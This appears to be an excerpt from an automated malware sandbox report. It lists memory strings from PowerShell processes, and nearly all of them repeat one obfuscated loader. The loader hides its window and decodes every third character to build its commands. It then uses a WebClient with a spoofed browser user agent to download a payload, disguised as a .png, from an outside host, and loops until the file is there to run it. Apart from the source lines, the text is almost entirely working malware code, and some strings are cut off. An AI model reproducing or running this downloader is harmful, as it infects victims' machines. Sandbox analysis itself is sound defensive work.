SChePac .uBerKiiPrtBey,cPt.r oButUnoRec Ho ,lF,TShyPop XeSl]Dr:K :S,T SlFosB.1Ir2To ');$Reveled=$Blodskamsforholds[0];$Lnindeholde= (Indbandtes ',o$ g.il SoRhbLia Kln,: AG Vn,uaChv,oeDer.hi.ee .t es =KaN.ceV.w e-lrOU,b OjTre,ocPrt TST yBls TtG.e FmKr.slNA.e.kt.e.MdW etrbDrCInlSoiAjeOvnGyt');$Lnindeholde+=$Arninge[1];Sloshily ($Lnindeholde);Sloshily (Indbandtes 'Fo$UnG Fn GaC,vFleAfrRaiAdePrt,hs S.KrHAdeDeaLsdS eNyr,rsGe[Ag$UnHK.e snVgnBre Us s]Ov= E$GuV ,eSclMop ,rDroVeer.v eCrtSk ');$Billardkers=Indbandtes 'Sa$.vGUnn,raCovAneU,r oiO,eCatLysn,.CoDCaoBrwP.nTel UoKoa kdRaF ri .lPreMe(.j$HaRNeeDrvO,eFal,nemed B,Fo$PaG Oe Mr omS.a unUniS.eS,sJ.) . ';$Germanies=$Arninge[0];Sloshily (Indbandtes 'Sa$TngSclWhoFob Ba AlC,: ,S .aSta,frE r TaBrnFrdCteMenRa4 c=Di(S T meflsOrt.r-StPScaOrt .hC lu$PrGSkePyr Fmasaman KiS.e,esK,)Bu ');while (!$Saarranden4) {Sloshily (Indbandtes 'Ly$,ugK.lF o sbSuaStlFo:AnN .oafn.yf.oaWevSeoA,r Ga ObEul,ue,r= .$SatM.r CuNoe T ') ;Sloshily $Billardkers;Sloshily (Indbandtes 'MuStotP.a,erU.t -BaS PlMieDueTep e G.4Tr ');Sloshily (Indbandtes 'ge$OvgBalU oRibanaCil H: GS.na ia TrPerBeaHunPld.eeSan.e4Re= I(KoT ievasemtE,-,iPDuaF.tG.hFe Kd$,iGtieFur KmNoaFonWai.ueKusF.)La ') ;Sloshil
              Source: powershell.exe, 00000002.00000002.2361305747.0000020B5CFD7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2361305747.0000020B5CFCA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: skolonners42nchamber='SUBsTR';$Apocrisiary++;}$Afgiftskolonners42nchamber+='ing';Function Indbandtes($Forsimple){$Afrettere=$Forsimple.Length-$Apocrisiary;For( $Afgiftskolonners42=2;$Afgiftskolonners42 -lt $Afrettere;$Afgiftskolonners42+=3){$Nedgangene+=$Forsimple.$Afgiftskolonners42nchamber.'Invoke'( $Afgiftskolonners42, $Apocrisiary);}$Nedgangene;}function Sloshily($Parasollernes){ & ($Paprr) ($Parasollernes);}$Velproevet=Indbandtes 'HeMB.o dzM,i.elFil Sa u/Sc5 P. G0Ry n( SW,oi.an.md,to Tw.hs . S.NS,TSe S1.o0Ar.He0Ca; H ,eWHji nnKi6 .4su;Pr TyxBo6,v4G ;Ke UlrD v A: ,1 D2 e1Ch.Pr0Di)Se ,rGr.e Mc ,kB.oFo/Se2Fe0Ca1 B0Su0R 1In0S,1R O,FSliInrMue SfduoAuxF./L,1Zi2Ar1R.. u0al ';$Hennes=Indbandtes ' ,UDisEpeA.rG -GgA eg ,ey.nBytB. ';$Reveled=Indbandtes 'SthF.tSetF.pHos.l:Po/.o/awa ,vUno,rcHyaRelofdNao Dp.oeT r huRe.idcNooC.m.r/NeJDrofyuCos .e ,4Ma. .p n BgA.>Mih.itQttDep os.o:Fr/In/R a vS.oGacSkapilO,dsoo ,p ,eBerS,u.ao enPreAn.SocR.oSymFj/ .JE,oCouArsVieB 4,d.Fap BnB,g , ';$Jejune203=Indbandtes 'Va>In ';$Paprr=Indbandtes 'B,iP,e hx H ';$Gushet='Zaristiske';$Ansvarsbevidsthed = Indbandtes 'FoeAac,vhGuo E Me%CoaG pJ pKudAdaS t Ba,u%,l\LiN ,eskgMalc.iL.gReeP.nBrt P.NoGN.a Bs S He& P& i ,oeA,cOmhB os. Ptul ';Sloshily (Indbandtes ' U$Prg GlVeo.eb a rlGl: .AObrS,n.pi Ln CgFoePa=S,( lc emSmdRe i./SicAl Fi$S,AAbn,as Av oaoprLasBub.reA v Si udalsPotHehUde .dRi) C ');Sloshily (Indbandtes 'Co$Deg TlTaoG.bpeaAclSu:MoBPalSeoJedS.s .kSma tmTesUnf,oo .rSphUnoAllM dInsP,=Sl$ MR Re fvEke rlcaeV dAd.Ves.lpU lPiiVatPa(Ta$DeJKoeDij.nu anSiefe2Ka0 ,3Se)Hy ');Sloshily (Indbandtes ' F[MoNUre tC .AlS.ee .r,hv Mi.kc ,e APLeoIniC,nPet,iMToaBln.eaApgHeeTrr t]D.:Es: eSBreAecKouObr.hisatTuyBePDrr Eo,rt.ao gc no lNa H,=Le M[FoNPae otOp. 
SChePac .uBerKiiPrtBey,cPt.r oButUnoRec Ho ,lF,TShyPop XeSl]Dr:K :S,T SlFosB.1Ir2To ');$Reveled=$Blodskamsforholds[0];$Lnindeholde= (Indbandtes ',o$ g.il SoRhbLia Kln,: AG Vn,uaChv,oeDer.hi.ee .t es =KaN.ceV.w e-lrOU,b OjTre,ocPrt TST yBls TtG.e FmKr.slNA.e.kt.e.MdW etrbDrCInlSoiAjeOvnGyt');$Lnindeholde+=$Arninge[1];Sloshily ($Lnindeholde);Sloshily (Indbandtes 'Fo$UnG Fn GaC,vFleAfrRaiAdePrt,hs S.KrHAdeDeaLsdS eNyr,rsGe[Ag$UnHK.e snVgnBre Us s]Ov= E$GuV ,eSclMop ,rDroVeer.v eCrtSk ');$Billardkers=Indbandtes 'Sa$.vGUnn,raCovAneU,r oiO,eCatLysn,.CoDCaoBrwP.nTel UoKoa kdRaF ri .lPreMe(.j$HaRNeeDrvO,eFal,nemed B,Fo$PaG Oe Mr omS.a unUniS.eS,sJ.) . ';$Germanies=$Arninge[0];Sloshily (Indbandtes 'Sa$TngSclWhoFob Ba AlC,: ,S .aSta,frE r TaBrnFrdCteMenRa4 c=Di(S T meflsOrt.r-StPScaOrt .hC lu$PrGSkePyr Fmasaman KiS.e,esK,)Bu ');while (!$Saarranden4) {Sloshily (Indbandtes 'Ly$,ugK.lF o sbSuaStlFo:AnN .oafn.yf.oaWevSeoA,r Ga ObEul,ue,r= .$SatM.r CuNoe T ') ;Sloshily $Billardkers;Sloshily (Indbandtes 'MuStotP.a,erU.t -BaS PlMieDueTep e G.4Tr ');Sloshily (Indbandtes 'ge$OvgBalU oRibanaCil H: GS.na ia TrPerBeaHunPld.eeSan.e4Re= I(KoT ievasemtE,-,iPDuaF.tG.hFe Kd$,iGtieFur KmNoaFonWai.ueKusF.)La ') ;Sloshily (Indbandtes ' r$Stg u
              Source: powershell.exe, 00000002.00000002.2357862558.0000020B5A9A0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\Users\user\Desktop\C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -windowstyle hidden "If (${host}.CurrentUICulture) {$Afgiftskolonners42nchamber='SUBsTR';$Apocrisiary++;}$Afgiftskolonners42nchamber+='ing';Function Indbandtes($Forsimple){$Afrettere=$Forsimple.Length-$Apocrisiary;For( $Afgiftskolonners42=2;$Afgiftskolonners42 -lt $Afrettere;$Afgiftskolonners42+=3){$Nedgangene+=$Forsimple.$Afgiftskolonners42nchamber.'Invoke'( $Afgiftskolonners42, $Apocrisiary);}$Nedgangene;}function Sloshily($Parasollernes){ & ($Paprr) ($Parasollernes);}$Velproevet=Indbandtes 'HeMB.o dzM,i.elFil Sa u/Sc5 P. G0Ry n( SW,oi.an.md,to Tw.hs . S.NS,TSe S1.o0Ar.He0Ca; H ,eWHji nnKi6 .4su;Pr TyxBo6,v4G ;Ke UlrD v A: ,1 D2 e1Ch.Pr0Di)Se ,rGr.e Mc ,kB.oFo/Se2Fe0Ca1 B0Su0R 1In0S,1R O,FSliInrMue SfduoAuxF./L,1Zi2Ar1R.. u0al ';$Hennes=Indbandtes ' ,UDisEpeA.rG -GgA eg ,ey.nBytB. ';$Reveled=Indbandtes 'SthF.tSetF.pHos.l:Po/.o/awa ,vUno,rcHyaRelofdNao Dp.oeT r huRe.idcNooC.m.r/NeJDrofyuCos .e ,4Ma. .p n BgA.>Mih.itQttDep os.o:Fr/In/R a vS.oGacSkapilO,dsoo ,p ,eBerS,u.ao enPreAn.SocR.oSymFj/ .JE,oCouArsVieB 4,d.Fap BnB,g , ';$Jejune203=Indbandtes 'Va>In ';$Paprr=Indbandtes 'B,iP,e hx H ';$Gushet='Zaristiske';$Ansvarsbevidsthed = Indbandtes 'FoeAac,vhGuo E Me%CoaG pJ pKudAdaS t Ba,u%,l\LiN ,eskgMalc.iL.gReeP.nBrt P.NoGN.a Bs S He& P& i ,oeA,cOmhB os. 
Ptul ';Sloshily (Indbandtes ' U$Prg GlVeo.eb a rlGl: .AObrS,n.pi Ln CgFoePa=S,( lc emSmdRe i./SicAl Fi$S,AAbn,as Av oaoprLasBub.reA v Si udalsPotHehUde .dRi) C ');Sloshily (Indbandtes 'Co$Deg TlTaoG.bpeaAclSu:MoBPalSeoJedS.s .kSma tmTesUnf,oo .rSphUnoAllM dInsP,=Sl$ MR Re fvEke rlcaeV dAd.Ves.lpU lPiiVatPa(Ta$DeJKoeDij.nu anSiefe2Ka0 ,3Se)Hy ');Sloshily (Indbandtes ' F[MoNUre tC .AlS.ee .r,hv Mi.kc ,e APLeoIniC,nPet,iMToaBln.eaApgHeeTrr t]D.:Es: eSBreAecKouObr.hisatTuyBePDrr Eo,rt.ao gc no lNa H,=Le M[FoNPae otOp. SChePac .uBerKiiPrtBey,cPt.r oButUnoRec Ho ,lF,TShyPop XeSl]Dr:K :S,T SlFosB.1Ir2To ');$Reveled=$Blodskamsforholds[0];$Lnindeholde= (Indbandtes ',o$ g.il SoRhbLia Kln,: AG Vn,uaChv,oeDer.hi.ee .t es =KaN.ceV.w e-lrOU,b OjTre,ocPrt TST yBls TtG.e FmKr.slNA.e.kt.e.MdW etrbDrCInlSoiAjeOvnGyt');$Lnindeholde+=$Arninge[1];Sloshily ($Lnindeholde);Sloshily (Indbandtes 'Fo$UnG Fn GaC,vFleAfrRaiAdePrt,hs S.KrHAdeDeaLsdS eNyr,rsGe[Ag$UnHK.e snVgnBre Us s]Ov= E$GuV ,eSclMop ,rDroVeer.v eCrtSk ');$Billardkers=Indbandtes 'Sa$.vGUnn,raCovAneU,r oiO,eCatLysn,.CoDCaoBrwP.nTel UoKoa kdRaF ri .lPreMe(.j$HaRNeeDrvO,eFal,nemed B,Fo$PaG Oe Mr omS.a unUniS.eS,sJ.) . ';$Germanies=$Arninge[0];Sloshily (Indbandtes 'Sa$TngSclWhoFob Ba AlC,: ,S .aSta,frE r TaBrnFrdCteMenRa4 c=Di(S T meflsOrt.r-StPScaOrt .hC lu$PrGSkePyr Fmasaman KiS.e,esK,)Bu ');while (!$Saarranden4) {Sloshily (Indbandtes 'Ly$,ugK.lF o sbSuaStlFo:AnN .oafn.yf.oaWevSeoA,r Ga ObEul,ue,r= .$SatM.r CuNoe T ') ;Sloshily $Billardkers;Sloshily (Indbandtes 'MuStotP.a,erU.t -BaS PlMieDueTep e G.4Tr ');Sloshily (Indbandtes 'ge$OvgBa
              Source: powershell.exe, 00000005.00000002.2205456986.0000000008430000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ""C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "If (${host}.CurrentUICulture) {$Afgiftskolonners42nchamber='SUBsTR';$Apocrisiary++;}$Afgiftskolonners42nchamber+='ing';Function Indbandtes($Forsimple){$Afrettere=$Forsimple.Length-$Apocrisiary;For( $Afgiftskolonners42=2;$Afgiftskolonners42 -lt $Afrettere;$Afgiftskolonners42+=3){$Nedgangene+=$Forsimple.$Afgiftskolonners42nchamber.'Invoke'( $Afgiftskolonners42, $Apocrisiary);}$Nedgangene;}function Sloshily($Parasollernes){ & ($Paprr) ($Parasollernes);}$Velproevet=Indbandtes 'HeMB.o dzM,i.elFil Sa u/Sc5 P. G0Ry n( SW,oi.an.md,to Tw.hs . S.NS,TSe S1.o0Ar.He0Ca; H ,eWHji nnKi6 .4su;Pr TyxBo6,v4G ;Ke UlrD v A: ,1 D2 e1Ch.Pr0Di)Se ,rGr.e Mc ,kB.oFo/Se2Fe0Ca1 B0Su0R 1In0S,1R O,FSliInrMue SfduoAuxF./L,1Zi2Ar1R.. u0al ';$Hennes=Indbandtes ' ,UDisEpeA.rG -GgA eg ,ey.nBytB. ';$Reveled=Indbandtes 'SthF.tSetF.pHos.l:Po/.o/awa ,vUno,rcHyaRelofdNao Dp.oeT r huRe.idcNooC.m.r/NeJDrofyuCos .e ,4Ma. .p n BgA.>Mih.itQttDep os.o:Fr/In/R a vS.oGacSkapilO,dsoo ,p ,eBerS,u.ao enPreAn.SocR.oSymFj/ .JE,oCouArsVieB 4,d.Fap BnB,g , ';$Jejune203=Indbandtes 'Va>In ';$Paprr=Indbandtes 'B,iP,e hx H ';$Gushet='Zaristiske';$Ansvarsbevidsthed = Indbandtes 'FoeAac,vhGuo E Me%CoaG pJ pKudAdaS t Ba,u%,l\LiN ,eskgMalc.iL.gReeP.nBrt P.NoGN.a Bs S He& P& i ,oeA,cOmhB os. Ptul ';Sloshily (Indbandtes ' U$Prg GlVeo.eb a rlGl: .AObrS,n.pi Ln CgFoePa=S,( lc emSmdRe i./SicAl Fi$S,AAbn,as Av oaoprLasBub.reA v Si udalsPotHehUde .dRi) C ');Sloshily (Indbandtes 'Co$Deg TlTaoG.bpeaAclSu:MoBPalSeoJedS.s .kSma tmTesUnf,oo .rSphUnoAllM dInsP,=Sl$ MR Re fvEke rlcaeV dAd.Ves.lpU lPiiVatPa(Ta$DeJKoeDij.nu anSiefe2Ka0 ,3Se)Hy ');Sloshily (Indbandtes ' F[MoNUre tC .AlS.ee .r,hv Mi.kc ,e APLeoIniC,nPet,iMToaBln.eaApgHeeTrr t]D.:Es: eSBreAecKouObr.hisatTuyBePDrr Eo,rt.ao gc no lNa H,=Le M[FoNPae otOp. 
SChePac .uBerKiiPrtBey,cPt.r oButUnoRec Ho ,lF,TShyPop XeSl]Dr:K :S,T SlFosB.1Ir2To ');$Reveled=$Blodskamsforholds[0];$Lnindeholde= (Indbandtes ',o$ g.il SoRhbLia Kln,: AG Vn,uaChv,oeDer.hi.ee .t es =KaN.ceV.w e-lrOU,b OjTre,ocPrt TST yBls TtG.e FmKr.slNA.e.kt.e.MdW etrbDrCInlSoiAjeOvnGyt');$Lnindeholde+=$Arninge[1];Sloshily ($Lnindeholde);Sloshily (Indbandtes 'Fo$UnG Fn GaC,vFleAfrRaiAdePrt,hs S.KrHAdeDeaLsdS eNyr,rsGe[Ag$UnHK.e snVgnBre Us s]Ov= E$GuV ,eSclMop ,rDroVeer.v eCrtSk ');$Billardkers=Indbandtes 'Sa$.vGUnn,raCovAneU,r oiO,eCatLysn,.CoDCaoBrwP.nTel UoKoa kdRaF ri .lPreMe(.j$HaRNeeDrvO,eFal,nemed B,Fo$PaG Oe Mr omS.a unUniS.eS,sJ.) . ';$Germanies=$Arninge[0];Sloshily (Indbandtes 'Sa$TngSclWhoFob Ba AlC,: ,S .aSta,frE r TaBrnFrdCteMenRa4 c=Di(S T meflsOrt.r-StPScaOrt .hC lu$PrGSkePyr Fmasaman KiS.e,esK,)Bu ');while (!$Saarranden4) {Sloshily (Indbandtes 'Ly$,ugK.lF o sbSuaStlFo:AnN .oafn.yf.oaWevSeoA,r Ga ObEul,ue,r= .$SatM.r CuNoe T ') ;Sloshily $Billardkers;Sloshily (Indbandtes 'MuStotP.a,erU.t -BaS PlMieDueTep e G.4Tr ');Sloshily (Indbandtes 'ge$OvgBalU oRibanaCil H: GS.na ia TrPerBeaHunPld.eeSan.e4Re= I(
              Source: powershell.exe, 00000002.00000002.2357862558.0000020B5A9A0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2361305747.0000020B5CEDD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: powershell.exe -windowstyle hidden "If (${host}.CurrentUICulture) {$Afgiftskolonners42nchamber='SUBsTR';$Apocrisiary++;}$Afgiftskolonners42nchamber+='ing';Function Indbandtes($Forsimple){$Afrettere=$Forsimple.Length-$Apocrisiary;For( $Afgiftskolonners42=2;$Afgiftskolonners42 -lt $Afrettere;$Afgiftskolonners42+=3){$Nedgangene+=$Forsimple.$Afgiftskolonners42nchamber.'Invoke'( $Afgiftskolonners42, $Apocrisiary);}$Nedgangene;}function Sloshily($Parasollernes){ & ($Paprr) ($Parasollernes);}$Velproevet=Indbandtes 'HeMB.o dzM,i.elFil Sa u/Sc5 P. G0Ry n( SW,oi.an.md,to Tw.hs . S.NS,TSe S1.o0Ar.He0Ca; H ,eWHji nnKi6 .4su;Pr TyxBo6,v4G ;Ke UlrD v A: ,1 D2 e1Ch.Pr0Di)Se ,rGr.e Mc ,kB.oFo/Se2Fe0Ca1 B0Su0R 1In0S,1R O,FSliInrMue SfduoAuxF./L,1Zi2Ar1R.. u0al ';$Hennes=Indbandtes ' ,UDisEpeA.rG -GgA eg ,ey.nBytB. ';$Reveled=Indbandtes 'SthF.tSetF.pHos.l:Po/.o/awa ,vUno,rcHyaRelofdNao Dp.oeT r huRe.idcNooC.m.r/NeJDrofyuCos .e ,4Ma. .p n BgA.>Mih.itQttDep os.o:Fr/In/R a vS.oGacSkapilO,dsoo ,p ,eBerS,u.ao enPreAn.SocR.oSymFj/ .JE,oCouArsVieB 4,d.Fap BnB,g , ';$Jejune203=Indbandtes 'Va>In ';$Paprr=Indbandtes 'B,iP,e hx H ';$Gushet='Zaristiske';$Ansvarsbevidsthed = Indbandtes 'FoeAac,vhGuo E Me%CoaG pJ pKudAdaS t Ba,u%,l\LiN ,eskgMalc.iL.gReeP.nBrt P.NoGN.a Bs S He& P& i ,oeA,cOmhB os. 
Ptul ';Sloshily (Indbandtes ' U$Prg GlVeo.eb a rlGl: .AObrS,n.pi Ln CgFoePa=S,( lc emSmdRe i./SicAl Fi$S,AAbn,as Av oaoprLasBub.reA v Si udalsPotHehUde .dRi) C ');Sloshily (Indbandtes 'Co$Deg TlTaoG.bpeaAclSu:MoBPalSeoJedS.s .kSma tmTesUnf,oo .rSphUnoAllM dInsP,=Sl$ MR Re fvEke rlcaeV dAd.Ves.lpU lPiiVatPa(Ta$DeJKoeDij.nu anSiefe2Ka0 ,3Se)Hy ');Sloshily (Indbandtes ' F[MoNUre tC .AlS.ee .r,hv Mi.kc ,e APLeoIniC,nPet,iMToaBln.eaApgHeeTrr t]D.:Es: eSBreAecKouObr.hisatTuyBePDrr Eo,rt.ao gc no lNa H,=Le M[FoNPae otOp. SChePac .uBerKiiPrtBey,cPt.r oButUnoRec Ho ,lF,TShyPop XeSl]Dr:K :S,T SlFosB.1Ir2To ');$Reveled=$Blodskamsforholds[0];$Lnindeholde= (Indbandtes ',o$ g.il SoRhbLia Kln,: AG Vn,uaChv,oeDer.hi.ee .t es =KaN.ceV.w e-lrOU,b OjTre,ocPrt TST yBls TtG.e FmKr.slNA.e.kt.e.MdW etrbDrCInlSoiAjeOvnGyt');$Lnindeholde+=$Arninge[1];Sloshily ($Lnindeholde);Sloshily (Indbandtes 'Fo$UnG Fn GaC,vFleAfrRaiAdePrt,hs S.KrHAdeDeaLsdS eNyr,rsGe[Ag$UnHK.e snVgnBre Us s]Ov= E$GuV ,eSclMop ,rDroVeer.v eCrtSk ');$Billardkers=Indbandtes 'Sa$.vGUnn,raCovAneU,r oiO,eCatLysn,.CoDCaoBrwP.nTel UoKoa kdRaF ri .lPreMe(.j$HaRNeeDrvO,eFal,nemed B,Fo$PaG Oe Mr omS.a unUniS.eS,sJ.) . ';$Germanies=$Arninge[0];Sloshily (Indbandtes 'Sa$TngSclWhoFob Ba AlC,: ,S .aSta,frE r TaBrnFrdCteMenRa4 c=Di(S T meflsOrt.r-StPScaOrt .hC lu$PrGSkePyr Fmasaman KiS.e,esK,)Bu ');while (!$Saarranden4) {Sloshily (Indbandtes 'Ly$,ugK.lF o sbSuaStlFo:AnN .oafn.yf.oaWevSeoA,r Ga ObEul,ue,r= .$SatM.r CuNoe T ') ;Sloshily $Billardkers;Sloshily (Indbandtes 'MuStotP.a,erU.t -BaS PlMieDueTep e G.4Tr ');Sloshily (Indbandtes 'ge$OvgBalU oRibanaCil H: GS.na ia TrPerBeaHunPld.eeSan.e4Re= I(KoT ievasemtE,-,iPDuaF.tG
              Source: powershell.exe, 00000002.00000002.2485251498.0000020B74913000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2361305747.0000020B5C7B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2361305747.0000020B5CEDD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2357862558.0000020B5A9B5000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2361180627.0000020B5C460000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2196688153.0000000002BDA000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2196688153.0000000002B9E000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2197526043.00000000048A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2196688153.0000000002B0A000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2197275382.0000000004690000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If (${host}.CurrentUICulture) {$Afgiftskolonners42nchamber='SUBsTR';$Apocrisiary++;}$Afgiftskolonners42nchamber+='ing';Function Indbandtes($Forsimple){$Afrettere=$Forsimple.Length-$Apocrisiary;For( $Afgiftskolonners42=2;$Afgiftskolonners42 -lt $Afrettere;$Afgiftskolonners42+=3){$Nedgangene+=$Forsimple.$Afgiftskolonners42nchamber.'Invoke'( $Afgiftskolonners42, $Apocrisiary);}$Nedgangene;}function Sloshily($Parasollernes){ & ($Paprr) ($Parasollernes);}$Velproevet=Indbandtes 'HeMB.o dzM,i.elFil Sa u/Sc5 P. G0Ry n( SW,oi.an.md,to Tw.hs . S.NS,TSe S1.o0Ar.He0Ca; H ,eWHji nnKi6 .4su;Pr TyxBo6,v4G ;Ke UlrD v A: ,1 D2 e1Ch.Pr0Di)Se ,rGr.e Mc ,kB.oFo/Se2Fe0Ca1 B0Su0R 1In0S,1R O,FSliInrMue SfduoAuxF./L,1Zi2Ar1R.. u0al ';$Hennes=Indbandtes ' ,UDisEpeA.rG -GgA eg ,ey.nBytB. ';$Reveled=Indbandtes 'SthF.tSetF.pHos.l:Po/.o/awa ,vUno,rcHyaRelofdNao Dp.oeT r huRe.idcNooC.m.r/NeJDrofyuCos .e ,4Ma. 
.p n BgA.>Mih.itQttDep os.o:Fr/In/R a vS.oGacSkapilO,dsoo ,p ,eBerS,u.ao enPreAn.SocR.oSymFj/ .JE,oCouArsVieB 4,d.Fap BnB,g , ';$Jejune203=Indbandtes 'Va>In ';$Paprr=Indbandtes 'B,iP,e hx H ';$Gushet='Zaristiske';$Ansvarsbevidsthed = Indbandtes 'FoeAac,vhGuo E Me%CoaG pJ pKudAdaS t Ba,u%,l\LiN ,eskgMalc.iL.gReeP.nBrt P.NoGN.a Bs S He& P& i ,oeA,cOmhB os. Ptul ';Sloshily (Indbandtes ' U$Prg GlVeo.eb a rlGl: .AObrS,n.pi Ln CgFoePa=S,( lc emSmdRe i./SicAl Fi$S,AAbn,as Av oaoprLasBub.reA v Si udalsPotHehUde .dRi) C ');Sloshily (Indbandtes 'Co$Deg TlTaoG.bpeaAclSu:MoBPalSeoJedS.s .kSma tmTesUnf,oo .rSphUnoAllM dInsP,=Sl$ MR Re fvEke rlcaeV dAd.Ves.lpU lPiiVatPa(Ta$DeJKoeDij.nu anSiefe2Ka0 ,3Se)Hy ');Sloshily (Indbandtes ' F[MoNUre tC .AlS.ee .r,hv Mi.kc ,e APLeoIniC,nPet,iMToaBln.eaApgHeeTrr t]D.:Es: eSBreAecKouObr.hisatTuyBePDrr Eo,rt.ao gc no lNa H,=Le M[FoNPae otOp. SChePac .uBerKiiPrtBey,cPt.r oButUnoRec Ho ,lF,TShyPop XeSl]Dr:K :S,T SlFosB.1Ir2To ');$Reveled=$Blodskamsforholds[0];$Lnindeholde= (Indbandtes ',o$ g.il SoRhbLia Kln,: AG Vn,uaChv,oeDer.hi.ee .t es =KaN.ceV.w e-lrOU,b OjTre,ocPrt TST yBls TtG.e FmKr.slNA.e.kt.e.MdW etrbDrCInlSoiAjeOvnGyt');$Lnindeholde+=$Arninge[1];Sloshily ($Lnindeholde);Sloshily (Indbandtes 'Fo$UnG Fn GaC,vFleAfrRaiAdePrt,hs S.KrHAdeDeaLsdS eNyr,rsGe[Ag$UnHK.e snVgnBre Us s]Ov= E$GuV ,eSclMop ,rDroVeer.v eCrtSk ');$Billardkers=Indbandtes 'Sa$.vGUnn,raCovAneU,r oiO,eCatLysn,.CoDCaoBrwP.nTel UoKoa kdRaF ri .lPreMe(.j$HaRNeeDrvO,eFal,nemed B,Fo$PaG Oe Mr omS.a unUniS.eS,sJ.) . 
';$Germanies=$Arninge[0];Sloshily (Indbandtes 'Sa$TngSclWhoFob Ba AlC,: ,S .aSta,frE r TaBrnFrdCteMenRa4 c=Di(S T meflsOrt.r-StPScaOrt .hC lu$PrGSkePyr Fmasaman KiS.e,esK,)Bu ');while (!$Saarranden4) {Sloshily (Indbandtes 'Ly$,ugK.lF o sbSuaStlFo:AnN .oafn.yf.oaWevSeoA,r Ga ObEul,ue,r= .$SatM.r CuNoe T ') ;Sloshily $Billardkers;Sloshily (Indbandtes 'MuStotP.a,erU.t -BaS PlMieDueTep e G.4Tr ');Sloshily (Indbandtes 'ge$OvgBalU oRibanaCil H: GS.na ia TrPerBeaHunPld.eeSan.e4Re= I(KoT ievasemtE,-,iPDuaF.tG.hFe Kd$,iGtieFur KmNoaFonWai.ueKusF.
              Source: powershell.exe, 00000002.00000002.2361305747.0000020B5C9DC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2197526043.00000000049FA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ,o$ g.il SoRhbLia Kln,: AG Vn,uaChv,oeDer.hi.ee .t es =KaN.ceV.w e-lrOU,b OjTre,ocPrt TST yBls TtG.e FmKr.slNA.e.kt.e.MdW etrbDrCInlSoiAjeOvnGyt
              Source: powershell.exe, 00000005.00000002.2196688153.0000000002BDA000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2196688153.0000000002B9E000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2196688153.0000000002B0A000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2196941349.0000000002F60000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2197275382.0000000004690000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exeIf (${host}.CurrentUICulture) {$Afgiftskolonners42nchamber='SUBsTR';$Apocrisiary++;}$Afgiftskolonners42nchamber+='ing';Function Indbandtes($Forsimple){$Afrettere=$Forsimple.Length-$Apocrisiary;For( $Afgiftskolonners42=2;$Afgiftskolonners42 -lt $Afrettere;$Afgiftskolonners42+=3){$Nedgangene+=$Forsimple.$Afgiftskolonners42nchamber.'Invoke'( $Afgiftskolonners42, $Apocrisiary);}$Nedgangene;}function Sloshily($Parasollernes){ & ($Paprr) ($Parasollernes);}$Velproevet=Indbandtes 'HeMB.o dzM,i.elFil Sa u/Sc5 P. G0Ry n( SW,oi.an.md,to Tw.hs . S.NS,TSe S1.o0Ar.He0Ca; H ,eWHji nnKi6 .4su;Pr TyxBo6,v4G ;Ke UlrD v A: ,1 D2 e1Ch.Pr0Di)Se ,rGr.e Mc ,kB.oFo/Se2Fe0Ca1 B0Su0R 1In0S,1R O,FSliInrMue SfduoAuxF./L,1Zi2Ar1R.. u0al ';$Hennes=Indbandtes ' ,UDisEpeA.rG -GgA eg ,ey.nBytB. ';$Reveled=Indbandtes 'SthF.tSetF.pHos.l:Po/.o/awa ,vUno,rcHyaRelofdNao Dp.oeT r huRe.idcNooC.m.r/NeJDrofyuCos .e ,4Ma. .p n BgA.>Mih.itQttDep os.o:Fr/In/R a vS.oGacSkapilO,dsoo ,p ,eBerS,u.ao enPreAn.SocR.oSymFj/ .JE,oCouArsVieB 4,d.Fap BnB,g , ';$Jejune203=Indbandtes 'Va>In ';$Paprr=Indbandtes 'B,iP,e hx H ';$Gushet='Zaristiske';$Ansvarsbevidsthed = Indbandtes 'FoeAac,vhGuo E Me%CoaG pJ pKudAdaS t Ba,u%,l\LiN ,eskgMalc.iL.gReeP.nBrt P.NoGN.a Bs S He& P& i ,oeA,cOmhB os. 
